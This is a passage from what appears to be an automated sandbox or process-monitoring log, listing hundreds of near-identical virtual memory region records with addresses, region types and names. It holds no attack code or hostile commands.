= 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7801 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7802 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7803 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7804 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7805 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7810 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7811 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7812 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7813 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7814 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7815 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7820 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7821 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7825 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7826 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7827 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7828 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7829 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7830 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7831 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7832 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7833 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7834 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7841 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7845 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7852 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7853 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7854 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7857 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7858 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7859 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7860 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7863 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7864 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7865 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7866 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7867 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7870 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7871 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7872 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7873 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7874 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7875 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7876 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7877 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7878 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7879 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7880 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7881 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7882 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7883 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7884 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7887 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7888 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7889 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7890 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7891 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7892 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7893 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7894 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7895 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7896 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7897 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7898 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7899 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7900 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7901 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7902 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7904 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7905 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7906 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7908 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7909 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7910 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7911 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7912 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7913 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7916 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7917 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7918 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7919 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7920 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7921 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7922 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7923 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7924 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7925 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7926 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7927 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7928 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7929 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7930 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7931 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7932 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7933 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7934 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7935 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7936 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7937 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7938 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7939 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7940 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7941 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7942 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7943 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7944 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7945 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7946 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7947 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7948 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7949 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7950 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7951 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7958 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7961 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7962 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7963 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7965 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7968 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 7969 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7970 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7971 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7972 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7973 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7974 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7975 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7976 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7977 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7978 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7979 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7980 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7981 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7984 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7985 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7986 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7987 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 